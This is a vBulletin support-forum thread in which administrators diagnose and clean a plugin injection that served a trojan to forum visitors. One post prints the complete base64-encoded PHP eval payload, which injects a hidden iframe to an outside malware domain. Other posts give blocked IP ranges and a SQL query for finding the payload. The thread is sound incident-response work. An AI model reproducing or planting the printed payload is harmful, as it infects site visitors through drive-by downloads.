![]() |
new 0 day exploit? (bekebu.in / cuzelu.in)
I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in &/or cuzelu.in
http://support.clean-mx.de/clean-mx/...n&submit=query not sure if this was a new 0 day going around or not, but it may be worth someones time to look into this. :eek: --------------- Added [DATE]1277395487[/DATE] at [TIME]1277395487[/TIME] --------------- I have blocked out the /16 that those domains are coming from and google safebrowsing doesn't come up with the malware warning anymore. 91.188.0.0/16 http://www.db.ripe.net/whois?form_ty...&submit=Search http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55 http://www.senderbase.org/senderbase...g=91.188.59.55 |
What file is calling that site?
|
I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.
Code:
\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9\")); Code:
if (!isset($_COOKIE['xlov'])) { the url in the script code is broken on purpose --------------- Added [DATE]1277566152[/DATE] at [TIME]1277566152[/TIME] --------------- Thanks to the people over at Tapatalk for helping me figure this out. :wink: |
you're running Tapatalk on your vB? or is it just a clean install of vB?
|
We have been using tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in &/or cuzelu.in. A few days ago, one the admins @ tapatalk contacted us to let us know they had shut us down on their side due to the virii issue and have helped us locate some of this code.
--------------- Added [DATE]1277640262[/DATE] at [TIME]1277640262[/TIME] --------------- fealatoc . co . cc info: http://www.db.ripe.net/whois?form_ty...&submit=Search http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7 |
1 Attachment(s)
Post Thanks 'Hack' got hacked.
|
Also Reported to PT author @ https://vborg.vbsupport.ru/showpost....&postcount=948
|
I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.
|
Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the tapatalk plugin. I think it's the post thanks `hack` that is vulnerable, but this will need to be tested and confirmed.
|
I am not sure either, the information are mixed, some forum didn't install Tapatalk also got hacked. But one forum found a mysterious php file are added to the Tapatalk directory that caught our attention. So we went ahead to check our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).
We have sent out email to all forum owners to upgrade so I hope to keep this infection to the minimum. |
Your screenshot in https://vborg.vbsupport.ru/showpost....49&postcount=6 shows a Thank You plugin at the global_setup_complete hook.
There is no Thank You plugin that's using that hook. To blame the Thank You hack for this seems misguided. You were hacked by tapatalk. Lord knows what else got corrupted in the process. |
I would like to thank someDude-GP for posting that code. I have been dealing with this issue for a week on my site. You may have just helped me find this code.
I had deleted my tapatalk directory so I didn't have a possible roadmap to where they placed that code. Searching my datastore table just now it appears that they inserted it in one of my plugins. This is as far as I have gotten, but I am very encouraged to find a match to the code you posted. THANK YOU. I owe you some beers. caliman --------------- Added [DATE]1277699440[/DATE] at [TIME]1277699440[/TIME] --------------- In my case it was the 'Members who visted today' plugin that got infected. The global_start hook: Code:
if ($show['wvt']) Uninstalling the plugin did the trick. This also rebuilds the datastore. You can search your database to look for this code by doing this: Code:
SELECT * FROM plugin WHERE phpcode LIKE "%base64_decode%"; Hope this helps someone. This has been absolutely brutal. caliman |
Glad I could help you find that code caliman :)
djbaxter: The Post thanks mod was only a guess. I have way too many things going on to really dig into it very much. I did notice that the tapatalk plugin was updated on 06/25/2010 though. --------------- Added [DATE]1277730343[/DATE] at [TIME]1277730343[/TIME] --------------- What i did was go into plugins & products --> product manager. then i found the part of the plugin that had the code and just deleted the code |
Thanks again. I was serious about the beer.
I have confirmed that this removed the exploit from my site. |
Thanks to both of you. While my forum wasn't showing any symptoms, I did the search using phpMyAdmin and verified that the exploit was not present on my forums.
|
All times are GMT. The time now is 06:16 AM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
![]() |
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|